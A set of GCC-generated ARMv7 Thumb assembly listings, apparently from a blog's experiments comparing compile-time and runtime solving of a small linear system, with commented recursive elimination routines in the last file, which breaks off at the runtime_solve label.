.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_triangular_matrix.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 368
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, lr}
movw r4, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r4, #:upper16:.LANCHOR0
mov r1, r4
movs r2, #200
adds r4, r4, #200
sub sp, sp, #404
add r0, sp, #200
add r5, sp, #160
bl memcpy
fldd d7, [sp, #200]
ldmia r4!, {r0, r1, r2, r3}
fldd d6, [sp, #240]
fstd d7, [sp, #72]
fldd d5, [sp, #248]
fstd d6, [sp, #56]
fldd d4, [sp, #280]
fldd d13, [sp, #288]
fldd d1, [sp, #296]
fldd d9, [sp, #320]
fldd d6, [sp, #328]
fldd d2, [sp, #336]
fldd d10, [sp, #344]
fldd d7, [sp, #360]
fstd d5, [sp, #80]
fcpyd d12, d7
fldd d7, [sp, #368]
fstd d1, [sp, #96]
fcpyd d1, d7
fldd d7, [sp, #376]
fldd d5, [sp, #384]
fldd d11, [sp, #392]
stmia r5!, {r0, r1, r2, r3}
ldmia r4!, {r0, r1, r2, r3}
fcpyd d14, d5
fldd d3, .L3
fstd d4, [sp, #88]
stmia r5!, {r0, r1, r2, r3}
ldmia r4, {r0, r1}
fmuld d4, d7, d3
fstd d7, [sp, #120]
stmia r5, {r0, r1}
movw r0, #:lower16:.LC2
fldd d0, [sp, #160]
movt r0, #:upper16:.LC2
fldd d15, [sp, #168]
fldd d7, [sp, #176]
fldd d8, [sp, #184]
fldd d5, [sp, #192]
fstd d0, [sp, #136]
fmuld d0, d5, d3
fstd d5, [sp, #144]
fstd d12, [sp, #104]
fstd d1, [sp, #112]
fstd d14, [sp, #128]
fmuld d5, d12, d3
fcpyd d12, d0
fmscd d12, d11, d8
fmuld d1, d1, d3
fcpyd d8, d12
fcpyd d12, d4
fmscd d12, d2, d11
fcpyd d2, d1
fstd d12, [sp, #48]
fmscd d2, d6, d11
fcpyd d6, d5
fstd d2, [sp, #40]
fmscd d6, d9, d11
fcpyd d9, d0
fstd d6, [sp, #64]
fmscd d9, d11, d7
fmuld d14, d14, d3
fmuld d3, d11, d3
fcpyd d12, d9
fstd d3, [sp, #32]
fcpyd d9, d14
fmscd d9, d10, d11
fldd d10, [sp, #48]
fsubd d14, d3, d14
fldd d3, [sp, #88]
fstd d8, [sp, #88]
fcpyd d2, d1
fmuld d6, d14, d10
fldd d10, [sp, #64]
fmscd d2, d13, d11
fldd d13, [sp, #40]
fcpyd d7, d9
fmuld d13, d14, d13
fmuld d8, d14, d8
fcpyd d9, d5
fmuld d14, d14, d10
fcpyd d10, d0
fmscd d9, d3, d11
fldd d3, [sp, #96]
fmscd d10, d11, d15
fcpyd d15, d4
fmscd d15, d3, d11
fldd d3, [sp, #32]
fstd d15, [sp, #96]
fsubd d4, d3, d4
fldd d3, [sp, #56]
fcpyd d15, d5
fmscd d15, d3, d11
fldd d3, [sp, #32]
fstd d15, [sp, #152]
fcpyd d15, d8
fmscd d15, d7, d12
fcpyd d12, d13
fstd d15, [sp, #56]
fmscd d12, d7, d2
fcpyd d15, d6
fcpyd d2, d14
fmscd d15, d7, d4
fmscd d2, d7, d9
fldd d9, [sp, #136]
fcpyd d4, d15
fcpyd d15, d2
fldd d2, [sp, #80]
fsubd d3, d3, d1
fmscd d1, d2, d11
fldd d2, [sp, #72]
fmscd d5, d2, d11
fcpyd d2, d8
fmscd d2, d7, d10
fmscd d0, d11, d9
fstd d2, [sp, #32]
fldd d9, [sp, #96]
fcpyd d2, d13
fmscd d6, d7, d9
fldd d9, [sp, #152]
fmscd d2, d7, d3
fcpyd d3, d14
fmscd d3, d7, d9
fcpyd d10, d3
fldd d3, [sp, #56]
fmscd d8, d7, d0
fmuld d9, d4, d3
fmuld d3, d4, d12
fmscd d14, d7, d5
fcpyd d0, d13
fldd d13, [sp, #32]
fcpyd d5, d9
fmscd d5, d6, d13
fcpyd d13, d3
fmscd d13, d6, d2
fmuld d4, d4, d15
fmscd d0, d1, d7
fcpyd d2, d13
fcpyd d13, d4
fmscd d13, d6, d10
fldd d10, [sp, #48]
fmscd d3, d0, d6
fmscd d4, d6, d14
fldd d14, [sp, #128]
fmscd d9, d6, d8
fmuld d1, d2, d5
fmuld d2, d2, d13
fmscd d1, d3, d9
fmscd d2, d3, d4
fldd d4, [sp, #144]
fdivd d2, d1, d2
fldd d1, [sp, #64]
fnmacd d5, d2, d13
fldd d13, [sp, #40]
fmrrd r2, r3, d2
fdivd d3, d5, d3
fldd d5, [sp, #56]
fnmacd d5, d2, d15
fstd d3, [sp]
fnmacd d5, d3, d12
fldd d12, [sp, #104]
fdivd d5, d5, d6
fldd d6, [sp, #88]
fnmacd d6, d2, d1
fldd d1, [sp, #112]
fstd d5, [sp, #8]
fnmacd d6, d3, d13
fnmacd d6, d5, d10
fnmacd d4, d12, d2
fdivd d6, d6, d7
fnmacd d4, d1, d3
fstd d6, [sp, #16]
fcpyd d7, d4
fldd d4, [sp, #120]
fnmacd d7, d4, d5
fnmacd d7, d14, d6
fdivd d11, d7, d11
fstd d11, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #404
@ sp needed
fldmfdd sp!, {d8-d15}
pop {r4, r5, pc}
.L4:
.align 3
.L3:
.word 0
.word 0
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 7,267
|
exp/static_c/exp/arm_asm/exp_volatile_a_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_volatile_a_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 432
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, lr}
movw r4, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r4, #:upper16:.LANCHOR0
mov r1, r4
movs r2, #200
adds r4, r4, #200
sub sp, sp, #468
add r0, sp, #264
add r5, sp, #224
bl memcpy
fldd d7, [sp, #264]
ldmia r4!, {r0, r1, r2, r3}
fldd d6, [sp, #272]
fldd d5, [sp, #280]
fldd d4, [sp, #288]
fstd d7, [sp, #136]
fldd d11, [sp, #296]
fstd d6, [sp, #104]
fldd d3, [sp, #304]
fstd d5, [sp, #120]
fldd d2, [sp, #312]
fstd d4, [sp, #88]
fldd d1, [sp, #320]
fldd d14, [sp, #328]
fldd d12, [sp, #336]
fldd d0, [sp, #344]
fldd d8, [sp, #352]
fldd d7, [sp, #360]
fldd d6, [sp, #368]
fldd d4, [sp, #376]
fldd d5, [sp, #384]
fstd d2, [sp, #144]
fldd d15, [sp, #392]
fstd d1, [sp, #152]
fstd d0, [sp, #160]
fstd d8, [sp, #168]
fstd d7, [sp, #176]
fstd d6, [sp, #80]
fstd d5, [sp, #96]
fstd d3, [sp, #128]
fldd d3, [sp, #400]
fldd d2, [sp, #408]
fldd d6, [sp, #416]
fldd d7, [sp, #424]
fldd d5, [sp, #432]
fstd d2, [sp, #192]
fcpyd d2, d5
fldd d5, [sp, #440]
fstd d7, [sp, #32]
fcpyd d0, d5
fldd d5, [sp, #448]
fstd d3, [sp, #184]
fcpyd d8, d5
fmuld d5, d11, d7
fldd d7, [sp, #456]
stmia r5!, {r0, r1, r2, r3}
ldmia r4!, {r0, r1, r2, r3}
stmia r5!, {r0, r1, r2, r3}
ldmia r4, {r0, r1}
stmia r5, {r0, r1}
movw r0, #:lower16:.LC2
fldd d1, [sp, #224]
movt r0, #:upper16:.LC2
fstd d5, [sp, #216]
fstd d1, [sp, #200]
fldd d1, [sp, #232]
fmuld d9, d12, d8
fldd d13, [sp, #240]
fstd d1, [sp, #208]
fldd d1, [sp, #248]
fldd d5, [sp, #256]
fstd d0, [sp, #48]
fstd d2, [sp, #40]
fcpyd d3, d5
fstd d8, [sp, #112]
fmuld d10, d6, d2
fstd d3, [sp, #56]
fmuld d5, d4, d8
fmuld d0, d6, d0
fmscd d9, d14, d7
fldd d14, [sp, #80]
fmscd d10, d15, d7
fldd d15, [sp, #184]
fstd d9, [sp, #64]
fldd d9, [sp, #32]
fmscd d5, d14, d7
fstd d10, [sp, #72]
fcpyd d14, d0
fldd d0, [sp, #48]
fmscd d14, d15, d7
fldd d15, [sp, #88]
fmuld d2, d6, d3
fldd d3, [sp, #32]
fstd d14, [sp, #80]
fldd d14, [sp, #96]
fmuld d3, d6, d3
fmuld d8, d11, d8
fmscd d8, d15, d7
fcpyd d15, d3
fldd d3, [sp, #56]
fmscd d15, d14, d7
fmuld d3, d4, d3
fstd d15, [sp, #96]
fmscd d2, d7, d1
fldd d1, [sp, #112]
fmuld d6, d6, d1
fldd d1, [sp, #40]
fstd d2, [sp, #88]
fmuld d10, d12, d0
fcpyd d15, d3
fmscd d15, d7, d13
fldd d13, [sp, #192]
fmscd d6, d13, d7
fldd d13, [sp, #48]
fmuld d2, d4, d9
fmuld d1, d4, d1
fmuld d3, d4, d13
fldd d13, [sp, #152]
fcpyd d4, d10
fldd d10, [sp, #120]
fmscd d4, d13, d7
fmuld d0, d11, d0
fcpyd d13, d4
fcpyd d4, d0
fldd d0, [sp, #160]
fmscd d4, d10, d7
fldd d10, [sp, #168]
fcpyd d14, d4
fcpyd d4, d1
fldd d1, [sp, #40]
fmscd d4, d10, d7
fstd d4, [sp, #168]
fcpyd d4, d2
fldd d2, [sp, #88]
fmscd d4, d0, d7
fstd d4, [sp, #184]
fldd d4, [sp, #56]
fmuld d10, d5, d2
fldd d2, [sp, #208]
fmuld d4, d12, d4
fmscd d4, d7, d2
fmuld d0, d11, d1
fstd d4, [sp, #160]
fldd d2, [sp, #80]
fmuld d1, d12, d9
fldd d9, [sp, #64]
fmuld d4, d9, d2
fldd d9, [sp, #176]
fmscd d3, d9, d7
fldd d9, [sp, #104]
fstd d3, [sp, #152]
fldd d3, [sp, #56]
fmuld d2, d2, d8
fmuld d3, d11, d3
fcpyd d11, d0
fldd d0, [sp, #72]
fmscd d11, d9, d7
fldd d9, [sp, #128]
fmuld d0, d0, d5
fmscd d1, d9, d7
fstd d0, [sp, #104]
fldd d9, [sp, #96]
fldd d0, [sp, #40]
fmuld d0, d12, d0
fmuld d12, d5, d9
fmscd d10, d6, d15
fldd d15, [sp, #80]
fmuld d5, d5, d15
fstd d10, [sp, #120]
fldd d10, [sp, #88]
fcpyd d15, d2
fcpyd d2, d12
fldd d12, [sp, #184]
fmscd d15, d6, d14
fldd d14, [sp, #104]
fmscd d4, d6, d13
fldd d13, [sp, #168]
fmscd d2, d6, d12
fmscd d14, d6, d13
fstd d2, [sp, #128]
fldd d13, [sp, #64]
fldd d2, [sp, #72]
fstd d14, [sp, #104]
fmuld d12, d13, d9
fldd d9, [sp, #136]
fmuld d14, d13, d10
fmuld d13, d2, d8
fldd d2, [sp, #216]
fmscd d2, d9, d7
fldd d9, [sp, #200]
fstd d2, [sp, #136]
fcpyd d2, d3
fldd d3, [sp, #160]
fmscd d2, d7, d9
fldd d9, [sp, #144]
fmscd d0, d9, d7
fldd d9, [sp, #64]
fmscd d14, d6, d3
fldd d3, [sp, #152]
fmscd d12, d6, d1
fmscd d5, d6, d3
fldd d3, [sp, #72]
fmscd d13, d6, d11
fldd d11, [sp, #96]
fmuld d10, d8, d10
fmuld d9, d9, d3
fldd d3, [sp, #128]
fmuld d8, d8, d11
fldd d11, [sp, #120]
fmuld d1, d4, d3
fldd d3, [sp, #104]
fmuld d11, d4, d11
fmuld d3, d3, d15
fmscd d10, d6, d2
fldd d2, [sp, #136]
fmscd d9, d0, d6
fmscd d8, d6, d2
fldd d2, [sp, #104]
fmscd d1, d5, d12
fldd d12, [sp, #128]
fmscd d11, d5, d14
fldd d14, [sp, #120]
fmscd d3, d5, d13
fldd d13, [sp, #48]
fmuld d0, d15, d14
fmuld d4, d4, d2
fmuld d2, d15, d12
fldd d15, [sp, #80]
fmscd d4, d9, d5
fldd d9, [sp, #72]
fmscd d0, d5, d10
fmscd d2, d5, d8
fmuld d8, d3, d11
fmuld d3, d3, d1
fmscd d8, d4, d0
fldd d0, [sp, #40]
fmscd d3, d4, d2
fldd d2, [sp, #88]
fdivd d3, d8, d3
fnmacd d11, d3, d1
fldd d1, [sp, #32]
fmrrd r2, r3, d3
fdivd d4, d11, d4
fldd d11, [sp, #96]
fnmacd d14, d3, d12
fstd d4, [sp]
fcpyd d10, d14
fldd d14, [sp, #104]
fnmacd d2, d3, d11
fnmacd d10, d4, d14
fdivd d10, d10, d5
fldd d5, [sp, #56]
fnmacd d2, d4, d9
fstd d10, [sp, #8]
fnmacd d2, d10, d15
fnmacd d5, d1, d3
fldd d1, [sp, #112]
fdivd d2, d2, d6
fcpyd d6, d5
fstd d2, [sp, #16]
fnmacd d6, d0, d4
fnmacd d6, d13, d10
fnmacd d6, d1, d2
fdivd d7, d6, d7
fstd d7, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #468
@ sp needed
fldmfdd sp!, {d8-d15}
pop {r4, r5, pc}
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 1,357
|
exp/static_c/exp/arm_asm/exp_static_a_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_static_a_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, fp, lr}
sub sp, sp, #36
adr fp, .L3
ldrd r10, [fp]
movw r0, #:lower16:.LC2
adr r9, .L3+8
ldrd r8, [r9]
movt r0, #:upper16:.LC2
adr r7, .L3+16
ldrd r6, [r7]
adr r5, .L3+24
ldrd r4, [r5]
adr r3, .L3+32
ldrd r2, [r3]
strd r10, [sp]
strd r8, [sp, #8]
strd r6, [sp, #16]
strd r4, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #36
@ sp needed
pop {r4, r5, r6, r7, r8, r9, r10, fp, pc}
.L4:
.align 3
.L3:
.word 232640199
.word -1075429521
.word 83248120
.word 1071841626
.word -1063973261
.word 1073030601
.word -1120311528
.word 1071782572
.word 87906252
.word -1075208333
.size main, .-main
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 3,725
|
exp/static_c/exp/arm_asm/exp_static_a_volatile_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_static_a_volatile_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 40
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, lr}
movw r4, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r4, #:upper16:.LANCHOR0
ldmia r4!, {r0, r1, r2, r3}
fldd d1, .L3
sub sp, sp, #76
add r5, sp, #32
fldd d14, .L3+8
stmia r5!, {r0, r1, r2, r3}
ldmia r4!, {r0, r1, r2, r3}
fldd d3, .L3+16
stmia r5!, {r0, r1, r2, r3}
ldmia r4, {r0, r1}
fldd d4, .L3+24
stmia r5, {r0, r1}
movw r0, #:lower16:.LC2
fldd d0, [sp, #32]
movt r0, #:upper16:.LC2
fldd d8, [sp, #40]
fldd d9, [sp, #48]
fldd d10, [sp, #56]
fldd d13, [sp, #64]
fldd d2, .L3+32
fmuld d1, d13, d1
fldd d5, .L3+40
fldd d15, .L3+48
fldd d6, .L3+56
fldd d7, .L3+64
fldd d11, .L3+72
fldd d12, .L3+80
fmscd d1, d10, d14
fmuld d3, d13, d3
fmuld d4, d13, d4
fmscd d3, d9, d14
fldd d9, .L3+88
fcpyd d10, d1
fldd d1, .L3+96
fmuld d2, d10, d2
fmscd d4, d8, d14
fldd d8, .L3+104
fmuld d5, d13, d5
fmscd d2, d3, d15
fldd d3, .L3+112
fmuld d6, d10, d6
fmscd d5, d0, d14
fldd d0, .L3+120
fmscd d6, d4, d15
fldd d4, .L3+128
fmuld d7, d10, d7
fmuld d11, d2, d11
fmscd d7, d5, d15
fldd d5, .L3+136
fmuld d12, d2, d12
fmscd d11, d6, d5
fldd d6, .L3+144
fmscd d12, d7, d5
fldd d5, .L3+152
fldd d7, .L3+160
fmuld d1, d11, d1
fmscd d1, d12, d8
fdivd d3, d1, d3
fldd d1, .L3+168
fnmacd d11, d3, d0
fldd d0, .L3+176
fmrrd r2, r3, d3
fdivd d11, d11, d8
fnmacd d2, d3, d9
fstd d11, [sp]
fnmacd d2, d11, d1
fldd d1, .L3+136
fdivd d2, d2, d1
fcpyd d1, d10
fstd d2, [sp, #8]
fnmacd d1, d3, d0
fldd d0, .L3+184
fnmacd d1, d11, d0
fldd d0, .L3+192
fnmacd d1, d2, d0
fnmacd d13, d3, d4
fdivd d1, d1, d15
fnmacd d13, d11, d5
fstd d1, [sp, #16]
fnmacd d13, d2, d6
fnmacd d13, d1, d7
fdivd d14, d13, d14
fstd d14, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #76
@ sp needed
fldmfdd sp!, {d8-d15}
pop {r4, r5, pc}
.L4:
.align 3
.L3:
.word -2061584302
.word 1075335659
.word 1202590843
.word -1071940895
.word 1889785610
.word -1071838659
.word 687194767
.word -1072394404
.word 700938662
.word -1070812614
.word 1030792151
.word -1071425782
.word -577243605
.word 1078075283
.word 886481250
.word -1071744785
.word 54975582
.word -1069401224
.word 236911768
.word 1082328925
.word -1811830240
.word 1083368220
.word 1742044232
.word -1065275150
.word 1087982832
.word 1096468689
.word -2109574618
.word 1095227578
.word -771634347
.word -1027562791
.word 2081240824
.word 1095358424
.word -1889785610
.word 1075869122
.word -1018708519
.word 1084323836
.word -515396076
.word 1075975290
.word 343597384
.word 1072777134
.word 1374389535
.word 1073815224
.word -1845343351
.word -1064953704
.word -501652180
.word -1068055720
.word -384829069
.word 1077407671
.word -2144047675
.word -1068734281
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC1:
.word -515396076
.word 1074795642
.word 1546188227
.word 1075364495
.word -687194767
.word -1071615837
.word 343597384
.word -1071757394
.word -1546188227
.word -1073201808
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 6,140
|
exp/static_c/exp/arm_asm/exp_runtime.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_runtime.c"
.text
.align 2
.global aijn
.thumb
.thumb_func
.type aijn, %function
aijn:
@ args = 8, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, lr}
mov r5, r0
fstmfdd sp!, {d8, d9}
mov lr, r2
mov r9, r3
sub sp, sp, #8
ldr r4, [sp, #56]
ldr r6, [sp, #60]
cmp r4, r6
beq .L6
add r10, r4, #1
str r6, [sp, #4]
str r10, [sp]
mov r7, r1
mov r8, r2
bl aijn
mov r0, r5
mov r1, r7
mov r2, r4
mov r3, r4
str r10, [sp]
str r6, [sp, #4]
fcpyd d8, d0
bl aijn
mov r2, r8
mov r0, r5
mov r1, r7
mov r3, r4
str r10, [sp]
str r6, [sp, #4]
fmuld d8, d8, d0
bl aijn
str r10, [sp]
mov r0, r5
str r6, [sp, #4]
mov r1, r7
mov r2, r4
mov r3, r9
fcpyd d9, d0
bl aijn
fnmacd d8, d9, d0
fcpyd d0, d8
add sp, sp, #8
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, r10, pc}
.L6:
mla r4, r2, r4, r3
add r5, r0, r4, lsl #3
fldd d0, [r5]
add sp, sp, #8
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, r10, pc}
.size aijn, .-aijn
.align 2
.global bin
.thumb
.thumb_func
.type bin, %function
@ -----------------------------------------------------------------------
@ bin -- recursive elimination of the right-hand side (companion to aijn).
@ In:  r0 = a (matrix base), r1 = b (vector base), r2 = i, r3 = k,
@      one stack argument n read at [sp,#56] after the prologue
@      (7-reg push = 28 + d8/d9 save = 16 + sub 12).
@ Out: d0 = double result.
@ Base case (k == n):  returns b[i]
@ Otherwise:           returns aijn(a,b,k,k,k+1,n) * bin(a,b,i,k+1,n)
@                            - aijn(a,b,i,k,k+1,n) * bin(a,b,k,k+1,n)
@ i.e. the same fraction-free elimination step applied to the vector --
@ inferred from the call pattern; TODO confirm against exp_runtime.c.
@ -----------------------------------------------------------------------
bin:
@ args = 4, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, lr}
mov r5, r1                       @ r5 = b
fstmfdd sp!, {d8, d9}            @ save callee-saved VFP scratch
mov r4, r3                       @ r4 = k
sub sp, sp, #12                  @ outgoing stack-arg slots
ldr r6, [sp, #56]                @ r6 = n (5th argument)
cmp r3, r6
beq .L11                         @ k == n -> base case: return b[i]
add r9, r3, #1                   @ r9 = k + 1
mov r8, r2                       @ r8 = i
str r6, [sp, #4]                 @ stack args for aijn: [sp] = k+1, [sp+4] = n
mov r2, r3                       @ i := k
str r9, [sp]
mov r7, r0                       @ r7 = a
bl aijn                          @ call 1: aijn(a,b,k,k,k+1,n)  (r3 = k still live-in)
mov r3, r9                       @ k := k+1
mov r0, r7
mov r1, r5
mov r2, r8                       @ i := original i
str r6, [sp]                     @ stack arg for bin: [sp] = n
fcpyd d8, d0                     @ d8 = call-1 result
bl bin                           @ call 2: bin(a,b,i,k+1,n)
mov r2, r8                       @ i := original i
mov r0, r7
mov r1, r5
mov r3, r4                       @ k := original k
str r9, [sp]
str r6, [sp, #4]
fmuld d8, d8, d0                 @ d8 = call1 * call2
bl aijn                          @ call 3: aijn(a,b,i,k,k+1,n)
mov r3, r9                       @ k := k+1
str r6, [sp]
mov r0, r7
mov r1, r5
mov r2, r4                       @ i := k
fcpyd d9, d0                     @ d9 = call-3 result
bl bin                           @ call 4: bin(a,b,k,k+1,n)
fnmacd d8, d9, d0                @ d8 = d8 - d9*d0
fcpyd d0, d8                     @ result in d0
add sp, sp, #12
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, pc}
.L11:
add r5, r1, r2, lsl #3           @ &b[i]; doubles, hence << 3
fldd d0, [r5]                    @ return b[i]
add sp, sp, #12
@ sp needed
fldmfdd sp!, {d8-d9}
pop {r4, r5, r6, r7, r8, r9, pc}
.size bin, .-bin
.align 2
.global solve_xi
.thumb
.thumb_func
.type solve_xi, %function
@ -----------------------------------------------------------------------
@ solve_xi -- computes one unknown of the linear system by substitution.
@ In:  r0 = a (matrix), r1 = b (vector), r2 = x (solution array),
@      r3 = i (index to solve), stack arg n at [sp,#56] after the
@      prologue (9-reg push = 36 + d8 save = 8 + sub 12).
@ Effect: x[i] = ( bin(a,b,i,i+1,n)
@                  - sum_{j=0..i-1} aijn(a,b,i,j,i+1,n) * x[j] )
@                / aijn(a,b,i,i,i+1,n)
@ so it relies on x[0..i-1] having been filled in by earlier calls.
@ No value is returned; the result is stored through the x pointer.
@ -----------------------------------------------------------------------
solve_xi:
@ args = 4, pretend = 0, frame = 0
@ frame_needed = 0, uses_anonymous_args = 0
push {r4, r5, r6, r7, r8, r9, r10, fp, lr}
add r8, r3, #1                   @ r8 = i + 1 (elimination step for every call below)
fstmfdd sp!, {d8}                @ d8 = running numerator (callee-saved VFP)
mov r5, r3                       @ r5 = i
mov fp, r2                       @ fp = x
mov r2, r3                       @ bin arg: i
mov r3, r8                       @ bin arg: i+1
mov r10, r0                      @ r10 = a
mov r9, r1                       @ r9 = b
sub sp, sp, #12                  @ outgoing stack-arg slots
ldr r7, [sp, #56]                @ r7 = n (5th argument)
str r7, [sp]
bl bin                           @ d0 = bin(a,b,i,i+1,n)
cmp r5, #0
fcpyd d8, d0                     @ numerator starts as the eliminated RHS entry
ble .L13                         @ i == 0: nothing to substitute
mov r6, fp                       @ r6 walks x[0..i-1]
movs r4, #0                      @ j = 0
.L14:
mov r3, r4                       @ j
str r8, [sp]                     @ [sp] = i+1, [sp+4] = n
mov r0, r10
str r7, [sp, #4]
mov r1, r9
mov r2, r5                       @ i
bl aijn                          @ d0 = aijn(a,b,i,j,i+1,n)
fldmiad r6!, {d7}                @ d7 = x[j]; post-increment the walker
adds r4, r4, #1                  @ j++
cmp r4, r5
fnmacd d8, d0, d7                @ numerator -= aijn(...) * x[j]
bne .L14                         @ loop while j < i
.L13:
mov r2, r5                       @ i
mov r3, r5                       @ i (diagonal element)
str r8, [sp]
mov r0, r10
str r7, [sp, #4]
mov r1, r9
bl aijn                          @ d0 = aijn(a,b,i,i,i+1,n) -- the pivot
add r5, fp, r5, lsl #3           @ &x[i]
fdivd d0, d8, d0                 @ x[i] = numerator / pivot
fstd d0, [r5]
add sp, sp, #12
@ sp needed
fldmfdd sp!, {d8}
pop {r4, r5, r6, r7, r8, r9, r10, fp, pc}
.size solve_xi, .-solve_xi
.align 2
.global runtime_solve
.thumb
.thumb_func
.type runtime_solve, %function
@ -----------------------------------------------------------------------
@ runtime_solve -- solves the whole system by calling solve_xi per index.
@ In:  r0 = a (matrix), r1 = b (vector), r2 = x (solution out), r3 = n.
@ Equivalent to: for (i = 0; i < n; i++) solve_xi(a, b, x, i, n);
@ Returns immediately (no work, no stack frame) when n <= 0.
@ -----------------------------------------------------------------------
runtime_solve:
